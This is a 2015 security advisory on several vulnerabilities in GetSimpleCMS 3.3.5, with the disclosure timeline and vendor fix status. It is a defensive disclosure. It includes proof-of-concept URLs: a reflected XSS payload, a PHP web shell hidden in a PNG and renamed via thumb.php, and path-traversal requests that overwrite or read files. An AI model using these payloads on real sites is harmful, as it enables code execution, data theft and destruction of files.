Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:32369
HistoryJul 27, 2015 - 12:00 a.m.

XSS, Code Execution, DOS, Password Leak, Weak Authentication in GetSimpleCMS 3.3.5

2015-07-2700:00:00
vulners.com
19

Vulnerability: XSS, Code Execution, DOS, Password Leak, Weak Authentication
Affected Software: GetSimpleCMS (http://get-simple.info/)
Affected Version: 3.3.5 (probably also prior versions)
Patched Version: 3.3.6 (partial fix)
Risk: Medium-High
Vendor Contacted: 2015-06-14
Vendor Partial Fix: 2015-07-14
Public Disclosure: 2015-07-15

GetSimple CMS is a content management system written in PHP. It does not
use a DBMS, but xml files instead.

There are various vulnerabilities in version 3.3.5, most of which are
fixed in version 3.3.6.

For version 3.3.6 it is important that the htaccess file of GetSimple
CMS is read by the server
, as otherwise passwords and other sensitive
information will be disclosed (the functionality of the website itself
is not affected by an unread htaccess file, so it might go unnoticed).

Password Leak (only partially fixed)

Risk
----

Medium-High; Passwords may leak, depending on Server configuration

Description
-----------

A lot of sensitive information is stored in .xml files inside the

web root. The .htaccess file of GetSimpleCMS does prevent access to .xml
files, but if the htaccess file is not used - for example because
AllowOverride None is set (eg for performance or security reasons) -
these files become readable. There is no warning in the admin area for
when this is happening.

Additionally, backups of these files may be stored with the

extension .bak, access to which is not denied by the .htaccess file.

The mentioned files can for example be found at the following locations:

http://localhost/GetSimpleCMS-3.3.5/backups/users/username.xml.bak
http://localhost/GetSimpleCMS-3.3.5/data/users/username.xml

Other xml files contain further sensitive information.

Mitigation / Comments on Vendor Fix
-----------------------------------

The vendor now also forbids access to .bak files. Other than that,

this issue was not fixed by the vendor, as it is not an issue if the
user has configured the webserver in a specific way.

Because of this, **it is extremely important that AllowOverride None

is set**.

Insufficient Cookie Authentication (not fixed)

Risk
----

Medium; Authentication bypass, depending on Server configuration

Description
-----------

The cookie used to authenticate users does not contain truly random

data, and never changes. It does contain:

 - $USR (user name)
 - $SALT (per default a value stored in

localhost/GetSimpleCMS-3.3.5/data/other/authorization.xml, see above)
- $cookie_name (contains the site name and the site version, none of
which should be sensitive information, and can be easily found in
various files)

Depending on server configuration, it is relatively easy for an

attacker to retrieve all of these values, which would enable them to log
in as any user.

Insufficient CSRF Protection (not fixed)

Risk
----

Low-Medium; CSRF protection can be bypassed, depending on Server

configuration

Description
-----------

The CSRF nonce does not contain truly random data and may thus be

guessed by an attacker. It does contain:

 - $action (known to attacker)
 - $file (known to attacker)
 - $SALT (site salt, see above)
 - $uid (user agent)
 - $time (two hour window)
 - $USR (user name)

$time is not a problem. If an attacker wants to, they can automatically

update it in their attack code.
This leaves the user agent. There are a lot of lists with the most
common user agents available, and they cover a high percentage of used
user agents, so this value can also relatively easily be guessed by an
attacker.

Reflected XSS

Risk
----

Medium; arbitrary javascript execution, which can lead to CSRF

protection bypass, which in this case leads to arbitrary code execution
via eg the theme editor

POC
---

http://localhost/GetSimpleCMS-3.3.5/admin/filebrowser.php?returnid=foobar&func=foobar %3D%3D 'function') {}}}alert(1); </script>

Code Execution (Admin)

Risk
----

Medium; An admin can execute arbitrary PHP code without using the

designated theme editor (this is bad because some users might disable
the theme editor for security reasons)

POC
---

 1. A valid image file with PHP code inside is needed (can eg be

created by creating a 1x1 png via gimp, and editing "created by gimp" in
vim to be <?php passthru($_GET['c']); ?>)
2. Upload image
3. rename file extensions:
http://localhost/GetSimpleCMS-3.3.5/admin/inc/thumb.php?src=evil.png&amp;dest=evil.php
4. visit PHP shell:
http://localhost/GetSimpleCMS-3.3.5/data/thumbs/evil.php?c=id

DOS (via CSRF)

Risk
----

Medium; Relevant System files can be destroyed by an admin or by an

attacker if admin visits their website

Description
-----------

Any file on the system that the web user has access to can be

overwritten with an image file that already exists on the server.
Credentials are required, but the request is not protected by CSRF
protection.

POC
---

http://localhost/GetSimpleCMS-3.3.5/admin/inc/thumb.php?src=evil.png&amp;dest=.../...//.../...//.../...//.../...//.../...//var/www/important

Code Execution (Admin, not with default config)

Risk
----

Minimal; requires admin credentials and custom configuration

Description
-----------

The function that validates file types can work with a blacklist

(default) or a whitelist.

The function works fine with default configuration. But if a user were

to use the whitelist approach, it would introduce a vulnerability, as
the validation then only relies on the given mime type, which is
entirely user controlled.

Directory Traversal

Risk
----

minimal; it is possible to go up one directory when viewing files

POC
---

localhost/GetSimpleCMS-3.3.5/admin/theme-edit.php?t=..&amp;f=gsconfig.php&amp;s=Edit

Timeline

2015-06-14: Requesting Contact Email via official forum
2015-06-15: Vendor Reply
2015-06-15: Send Advisory
2015-06-16: Vendor Confirmation, Issues opened
2015-06-22: Vendor Released Partial Fix as Beta Version
2015-07-13: Disclosure Announced
2015-07-13: Vendor Confirmation
2015-07-14: Vendor Releases Partial Fix
2015-07-15: Disclosure

Source

http://software-talk.org/blog/2015/07/getsimplecms-3-3-5-xss-code-execution-dos-password-leak-weak-authentication-misc/